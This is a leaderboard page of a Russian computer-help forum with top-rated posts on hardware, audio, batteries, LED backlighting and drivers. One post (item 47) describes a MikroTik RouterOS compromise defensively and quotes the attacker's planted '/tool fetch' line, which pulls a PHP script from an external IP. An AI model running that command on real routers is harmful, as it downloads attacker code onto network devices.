Jump to content
СофтФорум - всё о компьютерах и не только

Leaderboard


Popular Content

Showing content with the highest reputation since 10/16/18 in all areas

  1. 2 points
    Нету, кроме, как уже было сказано - написать в тех. поддержку. Еще раз повторюсь, конкретно у данной модели - 2 блина и 4 головки. Примеры с выложенными на фото винтами, вам не о чем не сказали? Все эти винты были подвергнуты вскрытию, если так понятнее. Сегодня разобрал еще один "крякнутый" винт, правда в формате 3.5". Количество блинов и головок можете лицезреть на фото. Как еще точнее вам инфу изложить? Ну можете вскрыть ваш винт, если так приспичило докопаться до истины.
  2. 2 points
    Просто я не мало их за свою практику работы перелопатил. Приходилось вытаскивать из клиентских ноутбуков/консолей, вытягивать инфу. Некоторые приходилось восстанавливать, ставить новые контроллеры и "привязывать" блины к ним. Не суть... По второму вопросу. Все это бред собачий. Берите любой винт, в работе, "на глаз", вы никакой разницы между 2 блинами и 1 блином вообще не увидите! Гораздо важнее, скорость вращения самого шпинделя и, собственно говоря, наличие мало-мальски мощного железа "под капотом" вашего ПК. ;)
  3. 2 points
    Что-то "полезное" есть только до рекомендации отключить "Windows Firewall", но шанс очень мал. Сокращайте количество открытых вкладок или добавляйте оперативной памяти. Файл подкачки случаем не отключен?
  4. 2 points
    А то! :) Привет! Давненько тебя не видно было. Как дела? Новый год с елкой будешь отмечать?
  5. 1 point
    Что-то помнится, что еще в лохматые года уже были онлайн-сервисы по определению музыки. Да и программы тоже. Но сам я ими никогда не пользовался. Сейчас загуглил, нашел статью по этому поводу: https://remontka.pro/opredelit-pesnyu/ Если кто-то есть рядом, кто понимает по английски на слух, то вообще просто, хотя бы строчку из песни вбиваем в Гугл, и как правило вуаля.
  6. 1 point
    Skipp во втором трэке услышал вокал The Offspring
  7. 1 point
    Эм-м... )))), Спасибо, конечно, но современные команды... Как-то мне менее интересны, к сожалению. Не, конечно же, я не кричу, размахивая руками - "Чур меня, чур!", но... Как-то не слежу за ними. Во всяком случае, представленные три трека - сильно напоминают RHCP (Red Hot Chili Pepper) по манере исполнения. К сожалению, утилитка Shazam - ушла от Windows ещё пару лет назад... Осталась она под Mac-машинки, и для смартфонов и планшетов. Поскольку я ею никогда не пользовался (за ненадом))) - то и ставить себе, скорее всего - не буду.
  8. 1 point
    Довелось разобрать один из двухкнопочных пультов, и посмотреть у него внутри. В начале этого лета один из пультов которые я "привязал" к описанной выше (6 ноября 2018) радиоуправляемой розетке был потерян на участке, и найден буквально недавно, втоптанным в землю. Таким образом он пролежал в земле примерно с июня по сентябрь: Похоже кроме того что он лежал в земле, его еще кто-то безуспешно грыз. Вскрытие показало, что питается он от двух литиевых батареек CR2016, соединенных последовательно. Напряжение питания - 6 вольт. При чем вышла из строя только одна батарейка, и довольно интересно. Она не просто разрядилась, но и поменяла полярность. Вторая батарейка была конечно тоже не первой свежести, но сохраняла работоспособность. Как я предполагал, схема в общем на тех же деталях что и передатчик TX118S-4 V1 описанный выше, но конструктивно конечно всё сделано по-другому. Можно например заметить встроенную антенну. После того как я отмыл и отчистил от ржавчины этот пульт и заменил батарейки на новые, он оказался исправным. Меня беспокоило то, что после смены батареек в пульте приёмник его уже не опознает, а повторная настройка будет затруднительна, так как мало того что нужно будет разбирать аппарат, но и еще отдирать корпус модуля от стенки коробки. Но нет, приёмник всё еще помнит этот пульт, и работает с ним нормально. Так что замена батареек не влечет за собой никаких проблем. Корпус скрепляют три болта (не самореза) никаких защелок нет, разобрать довольно просто, нужна только маленькая крестовая отвертка. Так что пульты такого типа вполне надежны. За 4 месяца лежания в земле фактически не произошло выхода из строя.
  9. 1 point
    Значит в разъёме никакого "железного" переключателя о котором я говорил нет, тут более хитро. Когда некая электронная схема обнаруживает подключение наушников, она перенаправляет звук согласно настроек, которые могут быть разные. В общем как в компьютере.
  10. 1 point
    Где? Несколько раз перечитал. Я же решил, что не хотите оставлять подключенные наушники рядом с телевизором, дабы не портить эстетику полки/тумбы/и т.п. кольцами провода.
  11. 1 point
    Насколько надежны сказать не могу, так как никогда ничем таким не пользовался. К тому же меня беспокоит то, от чего они питаются. Скорее всего аккумуляторы стоят и в "базе" и в самих наушниках. А это добавляет мороки, надо не забывать их заряжать. Хорошо бы найти простой и дешевый усилитель для наушников, который брал бы сигнал с тюльпана, питался бы от USB телевизора, и имел обычный разъём для подключения обычных наушников. Но чего-то такого я не нашел.
  12. 1 point
    Перво-наперво посмотреть в настройках телевизора, может быть там есть настройки перенаправления звука. Если таких настроек нет, то скорее всего там просто разъём с датчиком. Что это значит, сперва немного предыстории: В гнездо наушников, которое находится внутри телевизора, встроен переключатель, который своими контактами и переключает звук на динамики или наушники. Срабатывает этот переключатель чисто механически, когда втыкается разъём. Стало быть эту проблему каким-то внешним устройством решить если и можно, то фиг знает как. Скорее всего нельзя, или это будет какая-то эквилибристика с подтачиванием разъёма, или еще какая-нибудь ерунда, которую я только сейчас придумал. Что можно сделать в данном случае. Беспроводные наушники, это выход. Но нужно найти такие, которые включаются либо в выход Audio OUT (тюльпан), либо в гнездо SCART. С разъёмом HDMI вряд ли что-то получится, по крайней мере дешево и просто. PS: Гнездо наушников не трогаем, только или тюльпан, или SCART. Сейчас специально загуглил, оказывается таких наушников достаточно в продаже. Достаточно загуглить беспроводные наушники для телевизора. При указанных условиях наушники будут работать всегда, а если будут мешать динамики, то достаточно просто уменьшить звук до нуля, на работе наушников это не скажется. Естественно при покупке нужно выяснить все нюансы самостоятельно, я никаких гарантий не даю.
  13. 1 point
    Существуют радионаушники. Я тоже иногда пользуюсь наушниками, и проблему решил так: купил удлинитель и бросил за мебелью, чтобы не был виден. Наушники тоже не на виду - за диваном.
  14. 1 point
    Хоть это не блок, но всё равно источник питания. Решил немного рассказать о довольно новом типе аккумуляторов, таких как Никель-Цинковые (Ni-Zn). Разработаны они были еще Эдисоном, но в продаже появились относительно недавно. И насколько я могу судить, - так и не нашли свою "нишу", и остаются мало востребованными. Наиболее часто они встречаются в формфакторах АА и ААА, то есть как обычные популярные батарейки. Это "родня" всем никелевым аккумуляторам, но они позиционируются как специально разработанные для замены гальванических батареек на 1,5 вольт. И потому у них имеются некоторые отличия от например Ni-Cd, Ni-MH аккумуляторов. Думаю никто не будет спорить, что Ni-MH аккумулятор это не совсем корректная замена обычной батарейке в тех устройствах, которые рассчитывались на работу с ними. Потому что такой аккумулятор имеет рабочее напряжение 1,2 вольта, против 1,5 у батарейки. И свежезаряженный Ni-MH аккумулятор с точки зрения такого устройства уже ведет себя как наполовину севшая батарейка. И при ещё достаточном заряде Ni-MH аккумулятора, некоторые устройства уже не смогут работать. Аккумулятор отправится на преждевременную зарядку, чем будет спровоцирован т.н. эффект памяти, избавиться от которого довольно сложно. В Ni-Zn аккумуляторах этот момент учтен, их рабочее напряжение 1,6 вольта, и отсутствует эффект памяти. Так же имеются и другие отличия, например горизонтальный разрядный график. Что это значит: предположим мы подключили к обычной батарейке или Ni-Cd, Ni-MH аккумулятору лампочку, ждем и смотрим что будет. Лампочка сперва будет гореть ярко, потом начнет постепенно тускнеть, и наконец погаснет. То есть у таких аккумуляторов наклонный разрядный график. С Ni-Zn аккумулятором не так, лампочка будет гореть ярко, пока в какой-то момент резко не погаснет. Это и хорошо и плохо. Хорошо то, что аккумулятор выдает стабильное напряжение практически независимо от уровня заряда, а плохо тем что трудно следить за процессом разряда, и можно прощелкать момент когда напряжение снизится ниже критического уровня, и тем убить аккумулятор. Так как минимальное напряжение, ниже которого нельзя разряжать аккумулятор тут так же никто не отменял. В интернете данные по таким аккумуляторам разнятся, потому кое-что было взято из разных статей, кое-что додумал сам: Ёмкость Ni-Zn аккумуляторов измеряется не во всем привычных миллиамперах в час (mah), а в милливаттах в час (mwh). Скорее всего это связано с тем, что милливаттов почти в два раза больше чем миллиамперов. Думаю что китайцы как-то прознали, что в попугаях удав длиннее чем в слоненках. Другого объяснения я не вижу. Что бы перевести милливатты в миллиамперы, нужно милливатты поделить на напряжение питания.... какое? Рабочее (1,6) или в конце заряда (1,9)? Будем считать что рабочее. Ёмкость моих аккумуляторов 2500 mwh, значит делим на 1,6 V, получаем 1562,5 mah. Кто бы ещё в это поверил. Будем надеяться что на самом деле где-нибудь 700-1000 mah. Что в принципе тоже неплохо. Насчет тока заряда так же нет однозначных сведений, некоторые рекомендуют зарядный ток в 0,5-1 величины ёмкости, то есть до ампера. Но как мне представляется ток лучше особо не задирать, а лучше что бы он был до 0,5 от ёмкости. Ток не обязательно высчитывать и устанавливать слишком уж точно. Слишком маленький ток увеличивает время заряда, не исключено что до бесконечности. Слишком большой ток может испортить аккумулятор. При нормальном заряде аккумуляторы не должны заметно нагреваться. Минимальное напряжение (то есть такое, ниже которого аккумулятор разряжать нельзя) 1,2 вольта на элемент, чуть выше чем у NiCd, NiMH аккумуляторов (1,0), а вот максимальное - 1,9 вольт, против 1,4 у указанных. Вопрос чем заряжать такие аккумуляторы может возбудить неслабый холивар: Некоторые говорят что требуется или специальное зарядное устройство, или универсальное, но такое которое имеет официальную поддержку Ni-Zn аккумуляторов. Другие доказывают что подойдет любое зарядное устройство для NiCd, NiMH аккумуляторов. Мой ответ прост, - хотим по уму, нужно специальное. Хотим по колхозному, - включаем вашу зарядку в сеть без аккумуляторов, и измеряем напряжение на клеммах. Если оно не дотягивает до 1,9 вольт, то стало быть нет. А если "перетягивает", то да, но на свой страх и риск. Есть еще особенности: Как я указал выше, напряжение на свежезаряженном аккумуляторе - 1,9 вольт. И если NiCd, NiMH аккумуляторы после заряда довольно быстро сбрасывают напряжение до рабочего (1,2 с чем-то там), то Ni-Zn будет еще довольно долго удерживать где-нибудь 1,8 вольт. Например если тот или иной аппарат рассчитан на три обычных батарейки, то вместо 4,5 вольт при использовании таких аккумуляторов мы получим 5,4 вольта. А это уже довольно заметное превышение, и к аппарату может придти пушной зверек. Так что напряжением у этих аккумуляторов лучше считать не 1,6, а 1,7-1,8 вольт. Потому Ni-Zn аккумуляторы нежелательно сразу после заряда устанавливать в аппаратуру чувствительную к превышению напряжения. Для того что бы напряжение пришло в норму, придётся подождать некоторое, довольно длительное время. Потому если какая-то нужная аппаратура работает от таких аккумуляторов, лучше иметь их два-три комплекта, один-два из которых будут заряжаться и потом "отлеживаться", в то время когда другой работает. Так же довольно неприятной особенностью является ограниченный ресурс, всего 250-350 циклов заряд-разряд. Где использовать: Аппаратура терпящая некоторое превышение напряжения питания. Скорее всего [вероятно] будут нормально работать разные электромеханические игрушки, или старая аппаратура, типа приёмника с "веревочной" настройкой, изначально рассчитанного только на батарейки. Напряжение на свежей качественной батарейке тоже может быть несколько выше чем 1,5 вольта, так что может быть выживет. Насчет современной цифровой техники вроде фотоаппаратов - на свой страх и риск, прогугля эту тему. Купил я как-то хороший такой мощный "профессиональный" налобный фонарик, типа для туристов и спелеологов. Мощный фонарь, и на затылке кассета на 4 батарейки. Вставил эти аккумуляторы, - и полсекунды не прошло, - светодиоду кирдык. Некоторые однозначно рекомендуют такие аккумуляторы для светодиодных фонариков, но я бы поостерегся. Как эти аккумуляторы используются у меня: Никак не используются. Я их купил для указанного выше фонарика... но видно не судьба. Были разные проекты, где можно было бы их использовать, да что-то не срослось. Практически я эти аккумуляторы нигде не использовал, так как у меня нет какой-то аппаратуры где бы их можно было использовать. Другие материалы по данным аккумуляторам: https://www.youtube.com/watch?v=W6bmJgJo4J8 https://www.youtube.com/watch?v=kRd0TRDTgT4 https://ru.wikipedia.org/wiki/Никель-цинковый_аккумулятор https://mysku.ru/blog/aliexpress/33789.html https://kirill1985.ru/pokupka/3429-nizn-akkumulyatory.html Как говорится - думайте сами, решайте сами, иметь или не иметь.
  15. 1 point
  16. 1 point
    У меня поначалу возникло предположение, что раз устройство старое, то возможно это адаптер беспроводных клавы или мыши, но только не Блютус, и не Вайфай, а что-то своё. Дело в том что массовые в наше время беспроводные мыши не всегда были такими как сейчас. У меня в своё время был комплект клава + мышка, вообще работающие на CB (PS: Си-Би) диапазоне, 27,120 Мгц, если не ошибаюсь. Но с другой стороны, что-то я не помню, что происходило с компом, если включить такой адаптер без клавы и мыши поблизости, вроде бы и ничего не происходило. Не помню требовал ли такой адаптер драйверов, и видно было ли его как-то. Вроде бы нет. То есть определялись клава и мышка, но не адаптер. Хотя давно то было, не помню. На CB конечно такой относительно маленький девайс вряд ли работал, но вот на 433 Мгц, там где сидят разные автомобильные и другие сигнализации, и всякие пульты управления, - вполне вероятно. Загуглил нечто похожее - результатов ноль. Так что в печку этот девайс, что бы не смущал честнОй народ.
  17. 1 point
    Если не сломан, так как оборудование под win не видит(ну никак). Можно под Linux -ом попробовать(консольно).... Также возможно это донгл (ключ) зашиты к лицензионной программе - оборудованию (1С, каталоги запчастей, медицинское....).
  18. 1 point
    В подавляющем большинстве случаев такое поведение настраивается через Панель управления аудиодрайвером. Лично я - поступил проще. Дабы не заморачиваться, просто сунул в аудиовыход вот такую штуку На самом деле - есть несколько вариантов, в том числе и такой - И такой...
  19. 1 point
    Немного не понял, что нужно-то, что бы колонки с наушниками работали одновременно, я например это так понял. Не берусь утверждать, но скорее всего звук перенаправляет софтина от аудиокарты. Или если таковой нет, может быть можно поискать стороннюю программу. Но тут я не советчик.
  20. 1 point
    Да, есть такое дело. Это всё зависит ИМХО от того какая звуковая карта, и драйвера и софт на неё. У меня например так: когда подключаю наушники, допустим в передний разъём, при том что в задний разъём уже включены колонки, вылазит всплывающее окно, которое спрашивает, что со всем этим делать. Как видим выбраны наушники, но по логике я могу подключить что угодно. А если например поставить галки на "наушники" и на "выход на передние динамики" (так у меня), ну или при сложной акустике на какие-то другие динамики, то можно заставить звук идти на все выбранные устройства. Но я это проверять не буду, т.к. меня такая ситуация устраивает, я подключаю наушники только тогда когда они нужны, а когда они нужны - колонки не нужны. Так что найдите программу, управляющую вашей картой. У меня она называется как видно RealtekHD, у вас может быть по-другому, и действуйте через неё.
  21. 1 point
    Это может быть какой-то лицензионный ключ. Или не лицензионный, а какой-то другой, или что-то такое, завязанное на безопасность - либо для управления чем-либо, либо для получения доступа куда-то, вроде пропуска. Сейчас загуглил, вот например ключ от Лексуса: А это так вообще, "Sony PCSA-MCG106 - Лицензионный ключ на 6 точек многоточечной ВКС для PCS-XG100 и PCS-XG77", кто знает тот понимает, я лично ни то, ни другое. И такого барахла, когда непонятно что с USB портом - пруд пруди. И естественно если их создатели не полные идиоты, получить доступ к такой штуке средствами Винды будет нереально.
  22. 1 point
    Можно в диспетчере устройств порыться в USB-концентраторах (там обычно на каждый порт отдельное устройство "Корневой USB-концентратор" присутствует). У них на вкладке "Питание" прописываются подключённые к порту устройства, двойным кликом можно открыть свойства подключённого устройства, а оттуда уже значения VEN/DEV достать.
  23. 1 point
    Не это: http://www.premieraccessorygroup.com/index.php?p=our-brands&brand_id=27 ???
  24. 1 point
    Всё таки я склоняюсь к мысли что дело тут в ОС, а не в самом диске D. Может быть попробовать зайти в диспетчер задач, там могут работать какие-то процессы от недоудаленных антивирусов. Ну и поубивать их. (Современные антивирусы хуже прилипал каких-то, я как-то раньше пытался корректно удалить AVG Free, так и не смог. "Внутренняя безопасность" антивируса пресекает любые попытки помешать его работе, даже со стороны собственного деинсталлятора). Так же можно зайти в Службы, и посмотреть что связано с антивирусами. Ну и вообще, куда только можно. Насчет переустановки Винды так же не возражаю, при чем не исключаю что если переустановить Винду, то проблемы с диском D решатся сами собой.
  25. 1 point
    Бывает так, что какие-то файлы - используются внутренними процессами ОС, и потому - отказываются удаляться. Способы преодолеть подобное - есть. 1) Загрузить ОС в безопасном режиме, попробовать удалить файл. 2) Запустить машину под Live-версией Linux, хоть бы и той же Ubuntu - записывается bootable-флэшка с Ubuntu, произвести загрузку ОС с флэшки, найти и удалить файл. 3) Утилитка по имени Unlocker.
  26. 1 point
    ssssadad где покупали диск с Windows 7, можете фото купленной коробки прицепить? И, если не секрет, примерно за какую цену был куплен этот диск? Это многое прояснит. Драйверы следует качать с официального сайта производителя ноутбука. Очень часто производители не выкладывают драйверы устройств, которые уже присутствуют в поздних версиях Windows. Никакие утилиты для автоматической установки/обновления драйверов (кроме тех, что предлагаются производителем ноутбука) использовать не рекомендуется. К тому же, подобные утилиты, как правило, устанавливают только голые драйверы, в то время как многие устройства (например, звуковые карты), помимо самого драйвера, обычно требуют ещё дополнительный (заточенный для конкретного устройства) софт для управления и настройки этих устройств.
  27. 1 point
    Когда научимся пользоваться интернетом, а? Вот сейчас чисто из спортивного интереса, зашел на сайт МТС, естественно мой местный "филиал". Там выбрал "смартфоны", сортировка по увеличению цены. Самое дешевое устройство подпадающее под понятие "смартфон", это Digma Vox V40 8Gb Black. Цена у него - 2190 руб. То есть почти подпадает под техзадание. https://shop.mts.ru/product/smartfon-digma-vox-v40-8gb-black/specs Я бы не стал тут шашкой махать, в духе плохой это смартфон или хороший, кому-то может и хороший, кому-то и плохой. Разбираться надо. Покупать этот, или какой-то другой подобный телефон что бы сделать подробный обзор я не собираюсь. Себе бы я его не купил конечно, но вот был бы у меня внук-младший школьник, то возможно. Правда он бы этим телефоном мне в голову запустил. Уважаемый, у меня смартфон за 30 тыс, и я его каждый день заряжаю, и не вижу в том ничего плохого. А вы хотите купить за 2 тыс, и раз в неделю заряжать? Power bank в помощь.
  28. 1 point
    На ноуте у меня Семёрка - Скайп работает нормально. Версию сейчас не подскажу, потому как ноут - в Городе, а я - в деревне...
  29. 1 point
    У меня - не сообщает об отсутствии связи, но - может часами пытаться сконнектиться. Более ранние версии - "работают" как штатная новая, либо "не поддерживаются ОС" - у меня Десятка, лицензия. Пляски с совместимостью, Административным запуском - всё едино. В Отзывах - писал, на MSDN - писал - толку ноль. Впрочем, после того, как M$ купила Skype - он с каждым обновлением становился всё более унылым гуано. "Доулучшались"...
  30. 1 point
    Там все, что угодно может быть засрано вирусом, который вы словили, установив пресловутый "драйвер-пак". Какие-нибудь корневые экзешники загажены и фигушки вам удастся их вычистить, потому как они наверняка мимикрировали под системные и ОСь их ни за что удалять не станет, даже если антивирусом пройтись. Потому и говорю: единственный надежный вариант это - снос раздела и чистая установка винды. Так оно надежнее будет.
  31. 1 point
    Раз уж начался вечер воспоминаний..... Песня про DOS. Текст Леонид Каганов, музыка Юрий Шевчук.
  32. 1 point
    Ставил на Dell-3168 win7prox32. Многих дров знаю нет, но всё работает неплохо. Разницы с родной win10prox64 под которую и разрабатывался проц, не заметил без этих дров. Напоролся сам с этим Solution driver pack на резкий процесс нарастающего разгона проца. В итоге, чуть не спалил проц. Пришлось заново ставить винду и больше не кидать этот драйвер. Он потом откуда то с инета прилетел. Бывает и мелкософт суёт не те дрова, а бывает и офсайт Dell тоже может не то, что надо всунуть. Собственно, всё методом проб и ошибок и изучения доков.
  33. 1 point
    + Текстовый файл с требованием выкупа тоже прикрепите к следующему сообщению.
  34. 1 point
    Знаете, граждане... Лично я - пока прекрасно себя чувствую на AM3+ сокете, четырёхголовом камне и видюшкой HD7870. Последняя Metro: Exodus нормально работает на примерно 45-57 FPS, чего более чем достаточно. Да, настройки - Medium, но лично меня - больше интересует игра как таковая, а не пальцегнутие по поводу настроек... Не, кто б мне денег поболе дал - я бы и Штеуд'а последнего взял, али Райзена... Но - хватает головы просто всё нормально настроить, исходя из имеющегося. То бишь, как по мне - лучше за терпимые деньги взять годовой давности ТОП, который ещё лет пять будет хорош, нежели за большие бабки брать сейчас полутоп, который что ныне середняк, что потом - ещё того хуже...
  35. 1 point
    Судя по скриншоту система видит только цифровой вывод звука (через HDMI). Попробуйте в диспетчере устройств для "Устройства с поддержкой High Definition Audio" посмотреть другие доступные совместимые драйверы (там иногда системой предлагается несколько вариантов). Если ничего подходящего нет, создайте точку восстановления системы и попробуйте подсунуть в диспетчере устройств для этого устройства драйвер от Windows 7 (той же разрядности, разумеется).
  36. 1 point
    Спасибо. Взаимно всем всего самого нилучшего ** Когда идёт не по прямой, А вечные кривые. Тогда проблемы с головой, Ни раз не бытовые. А если вечно прямо, то – Лечиться нужно срочно. Могу поспорить – рупь за сто. Ты сумасшедший точно. Равны, что гений, идиот – Болезнь (тут на латыни). Нормальным будет только тот, Кто где-то в середине. ***
  37. 1 point
    Загрузка за 5 секунд? На м2 винтах вообще все летает. Хорошие агрегаты, правда дорогие, зараза... Но к лету будет сильный обвал цен (прядка 30-40%) на чипы памяти (технологии развиваются, и переход на новый процесс производства принес свои положительные плоды), вместе с ними упадут цены на всю ссд продукцию. Обычные модули памяти тоже упадут в цене, правда не так сильно.
  38. 1 point
    Надеюсь планки идентичны. 1) Проверь батарейку для BIOS. 2) Выставить тайминги для планок памяти принудительно. Для спокойствия прогони memtest. глянь. не просел ли Блок питания... . Также и конденсаторы на матери.
  39. 1 point
    Немного возвращаюсь к задней (фоновой) подсветке для телевизоров (и мониторов). Всё что тут описано НЕ является Ambilight, то есть никак не не связано ни с изображением на экране телевизора (монитора), ни с его звуковым сопровождением. Применяется такая подсветка для уменьшения нагрузки на глаза, при просмотре телевизора в темноте. Я уже делал заднюю подсветку для телевизора на основе т.н. лампы настроения на трёх мультивибраторах. Работало это всё вполне сносно, но питание шло от БП на 12 вольт, который требовалось включать и выключать отдельно от телевизора. Да и эффект был всего один, хотя и непредсказуемый. Решил пойти по другому пути, а именно питание подсветки взять от USB порта телевизора. Теперь пожалуй на всех, даже самых простых и дешевых телевизорах имеется хотя бы один такой порт. Таким образом подсветка включается и выключается одновременно с телевизором. Скажу сразу - я тут ничего не изобрёл, тема эта уже давно находится что называется "в разработке". В продаже имеются RGB светодиодные ленты с питанием 5 вольт, похоже специально предназначенные для питания от USB. А так же специальные контроллеры, как с пультом ДУ, так и без него, с управлением от кнопок на самом контроллере, так же способные работать от 5 вольт. Так же есть различные прочие приблуды - коннекторы, переходники, различные удлинители, и т.п.. Контроллер в любом случае "одним концом" подключается к USB, а другим - к RGB ленте. Для начала купил полный комплект из светодиодных лент, различных удлинителей и коннекторов, и RGB контроллера с пультом дистанционного управления. Выглядит такой контроллер так: Испытания показали что работает это всё не очень надежно. Хотя имелись и положительные отзывы, возможно мне не повезло, или я что-то не так сделал. Работало это всё неустойчиво, то работает, то нет. Дальность действия пульта не особо большая. Контроллер будучи подключен к телевизору не запускался при его включении, надо было "передернуть" шнур USB. Вероятно дело в каких-то помехах по питанию, мне по крайней мере так показалось. По некоторым сведениям пульт от этого контроллера мешает телевизору, который так же реагирует на сигналы этого пульта. Хотя я сам это не наблюдал. Потому эти контроллеры с пультами были отложены в долгий ящик. Но ленты остались, как и разные прочие коннекторы и удлинители, потому был куплен контроллер без пульта. Выглядят они похоже, только на них имеются кнопки: Этот контроллер показал более надежную работу, по крайней мере кнопок слушается четко, установленные настройки сохраняются и после отключения питания. Что он может, и для чего все эти кнопки тут описывать не буду, одно могу сказать, - имеется много разных эффектов, которыми я пользоваться конечно не буду. В разных телевизорах могут быть разные порты, рассчитанные на разные токи. В моем телевизоре два USB порта. Один для флешек, выдает до 500 mA, и более мощный порт для жестких дисков выдает ток до 1А. Конечно могут быть и иные варианты, тут надо разобраться конкретно со своим телевизором, какие у него есть порты, и не превышать ток порта. Установить ток мы сможем только подбирая длину ленты. Потому если есть сомнения, желательно сначала подключить контроллер с лентой не к телевизору или компьютеру, а какому-то блоку питания с USB портом через USB-тестер, или амперметр (мультиметр), установить на контроллере белый свет (т.е. зажечь все три канала с максимальной яркостью), и подбором длины ленты установить допустимый для того или иного порта ток. Так у меня используется всего два куска ленты, горизонтально, сверху и снизу телевизора, каждая по 52 см. (Минимальный кусочек - 3,5 см). В максимальном режиме они потребляют 650 mA, потому включены в более мощный порт. Обычно ленты наклеивают сзади на сам телевизор по периметру вблизи краев. Но так делать совсем не обязательно, ленту можно разместить и за телевизором, например на стене, изнутри ниши мебельной стенки, или на каком-то другом предмете. Но таким образом, что бы был виден свет от ленты падающий на окружающие предметы, но не сама лента. Насчет цвета и различных эффектов (чисто моё мнение). Всевозможные мигания и вспышки, столь любимые китайцами, использовать крайне нежелательно. Если зритель не китаец, то повторяющийся эффект быстро надоест и вызовет раздражение и глаз и нервов. Вообще лучше использовать белый, или какой-то очень слабо насыщенный светлый цвет вроде желтого, яркостью примерно такой же как яркость экрана. Использование ярких и насыщенных цветов может привести к искажению цветовосприятия и неприятным ощущениям. Слабо насыщенный цвет, то есть слегка подкрашенный белый при помощи RGB ленты получить довольно трудно, тут лучше использовать RGBW ленту, о которой уже говорилось в этой теме. Возможно вскорости займусь чем-то подобным, с 12-вольтовой RGBW лентой, поскольку их есть у меня... пять метров. Включаться и выключаться это всё будет автоматически вместе с телевизором. Ну и как это всё реализовано у меня: Контроллер у меня не закреплен сзади, а болтается на проводах снизу: Для удобного доступа, что бы если что-то захочется поменять не лазить за телевизор. Остальное я или подписал, или так понятно. При сборке использовались только покупные узлы, пайка не применялась. Ленты закреплены на двусторонний скотч описанный в предыдущем посте.
  40. 1 point
    Не люблю круглые цифры
  41. 1 point
    Рекламы не надо.
  42. 1 point
    Не понял, а то, что я сделал, не подошло?
  43. 1 point
    Вот сейчас смотрю и думаю, - а что у него за аппарат, на чем он собирается это делать, а фиг знает, военная тайна. Сейчас скажу - сделай в Paint, а вдруг он на телефоне с Андроидом, смешно буду выглядеть. Что за фотография, там одно лицо, групповое фото, или что-то еще. Дело в том, что у фотография горизонтальная, а экран у смартфона вертикальный. Можно обрезать\ нельзя обрезать, можно повернуть\ нельзя повернуть. Исходная фотография меньше чем должна получиться, можно растянуть\ нельзя растянуть.... можно ломать мозг... и так далее. Ну в общем правильно вы поняли.
  44. 1 point
  45. 1 point
    Пропорции у исходного фото и у экрана Сяоми разные. Фото на мобиле будет обрезано, а если не обрезать, по краям будут чёрные полосы. Или промежуточный вариант - немного обрезано фото и будут по краям небольшие чёрные полосы. Объяснять, как это сделать, человеку далёкому от компа, мне в лом, проще сделать. Ссылку на фото в студию ЛС.
  46. 1 point
    Тупой тест от 'Высокого Средневековья' Веселого дня
  47. 1 point
    23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS. Причем уязвимость позволяет узнать логин и пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно. Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро. Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них: /tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http В файлах соответственно mikrotik.php Отключаются все запрещающие правила фаервола. Создаются задачи в планировщике по запуску скрипта. Открывается сокс-прокси на нестандартном порту. Меняются адреса днс-серверов. Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака. Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа. Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации. Ну пару советов по безопасности: IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные. Грамотно настроить фаерволл. В случае если факт взлома был зафиксирован - сменить пароль на микротик. Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533
  48. 1 point
    Увы и "Ах", но облака не использую. Вообще. В твоём же случае - подозреваю, что трабл - в провайдере, а не в камне. Прекрасно понимаю, что ни фига интересного в моих данных нет, но тем не менее - храню всё локально. Да, на разных носителях, но - ничего "дядькам" не кладу. Параноик, наверное, но те же деньги (в купюрах) - держу в банке. Стеклянной. Да, пластиковая карта есть, но - безымянная дебетовая. И лежит на ней - максимум пятёрка штук. Ибо нефиг.
  49. 1 point
    - Так-ведь можно и по морде получить, поручик! - Согласен, можно... но можно и впендюрить! Онлайн версия. Без установки плагина как раз один чат. https://skypefan.ru/online/ А тут описано, как пользовать скайп без регистрации в гостевом режиме http://skype-free.ru/skype-bez-registracii.html
  50. 1 point
    OVERLORD, в любом ПО для записи дисков есть опция "Запись из образа". При этом в программе обычно предлагается указать тот самый ISO-файл, из которого будет записываться диск. Простая запись ISO-файла на диск ничего не даст. ISO-файл представляет собой, грубо говоря, архив, внутри которого, помимо пользовательских файлов, есть ещё различные служебные участки, куда как раз таки записывается загрузчик Windows, который потом запускается при загрузке с болванки.
This leaderboard is set to Moscow/GMT+03:00


×
×
  • Create New...